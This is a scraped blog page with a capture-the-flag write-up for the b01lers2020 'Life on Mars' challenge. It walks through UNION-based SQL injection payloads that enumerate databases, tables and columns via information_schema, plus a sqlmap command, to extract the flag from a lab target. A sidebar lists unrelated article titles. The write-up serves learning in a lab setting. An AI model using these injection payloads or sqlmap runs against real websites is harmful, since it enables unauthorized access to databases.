当前位置:网站首页>[b01lers2020]Life on Mars
[b01lers2020]Life on Mars
2022-08-03 22:03:00 【New Reading of the Classic of Tea.】
[b01lers2020]Life on Mars
A general look at the points is not important, f12 found nothing, and the packet capture found GET /query?search=&amazonis_planitia&{}&_=1659321817406
strong>, click on different titles, the content of amazonis_planitia will also change with itAttempt to enter the page it appears on this page
Find a lot of data, try union query: /query?search=amazonis_planitia union select 1,2, find that there areecho
Check the library: /query?search=amazonis_planitia union select version(),database()
Check the table: /query?search=amazonis_planitia union select 1,group_concat(table_name) from information_schema.tables where table_schema='aliens'
After checking, I found that the echoed things are the titles of the first page, query the fields of the table: /query?search=amazonis_planitia union select1,group_concat(column_name) from information_schema.columns where table_name='amazonis_planitia', nothing special
Use the sqlmap tool to scan it
sqlmap download: sqlmap: automatic SQL injection and database takeover tool
python2 sqlmap.py -u http://xxxxxxxx.node4.buuoj.cn:81/query?search=amazonis_planitia --dbs
I found that there are three databases in the modified webpage, and you can check it yourself: /query?search=amazonis_planitia union select 1,group_concat(schema_name) from information_schema.SCHEMATA, there are indeed three databases
I have already queried aliens and found nothing, continue to query the table of alien_code: /query?search=amazonis_planitia union select 1,group_concat(table_name)from information_schema.tables where table_schema='alien_code'
Query the fields of the code table: /query?search=amazonis_planitia union select 1,group_concat(column_name) from information_schema.columns where table_name='code'
Check the content: /query?search=amazonis_planitia union select group_concat(id),group_concat(code) from alien_code.code
This is the end, let's spread the flowers
边栏推荐
- [kali-vulnerability scanning] (2.1) Nessus lifts IP restrictions, scans quickly without results, and plugins are deleted (middle)
- 超级实用网站+公众号合集
- 线上服务器老是卡,该如何优化?
- AI首席架构师13-AICA-智能文档分析技术在行业场景中的应用
- gtk实现图片旋转
- CAS:1620523-64-9_Azide-SS-biotin_生物素-二硫-叠氮
- YOLO之父宣布退出CV界,坦言无法忽视自己工作带来的负面影响
- 从0到1看支付
- 【历史上的今天】8 月 3 日:微软研究院的创始人诞生;陌陌正式上线;苹果发布 Newton OS
- 一些思考:腾讯股价为何持续都低
猜你喜欢
VLAN实验
[kali-vulnerability scanning] (2.1) Nessus download and installation (on)
聚焦开源与联合共创|麒麟软件出席开源峰会欧拉分论坛
E-commerce data warehouse ODS layer-----log data loading
CAS:1620523-64-9_Azide-SS-biotin_biotin-disulfide-azide
YOLO之父宣布退出CV界,坦言无法忽视自己工作带来的负面影响
老板:公司系统太多,能不能实现账号互通?
软件测试人员必备的60个测试工具清单,建议收藏一波~
如何设计 DAO 的 PoW 评判标准 并平衡不可能三角
现网设备兼容SRv6网络演进
随机推荐
CAS:122567-66-2_DSPE-Biotin_DSPE-Biotin
[kali-vulnerability scanning] (2.1) Nessus download and installation (on)
template string
483. Smallest Good Base
线上服务器老是卡,该如何优化?
LVS负载均衡集群
数据一致性:双删为什么要延时?
码率vs.分辨率,哪一个更重要?
主板设计中:网络变压器与RJ45网口之间应该保持什么样的距离?
How to deal with commas in the content of the CSV file of the system operation and maintenance series
【kali-漏洞扫描】(2.1)Nessus解除IP限制、扫描快无结果、插件plugins被删除(中)
【kali-漏洞扫描】(2.1)Nessus下载安装(上)
mysql如何将表结构导出到excel
CAS: 773888-45-2_BIOTIN ALKYNE_生物素-炔基
【云原生实用技巧】使用 skopeo 批量同步 helm chart 依赖镜像
封装、包、访问权限修饰符、static变量
E - Swap
CAS:1260586-88-6_Biotin-C5-Azide_Biotin-C5-Azide
Soft exam system analysts note experience sharing: theory of protracted war
【历史上的今天】8 月 3 日:微软研究院的创始人诞生;陌陌正式上线;苹果发布 Newton OS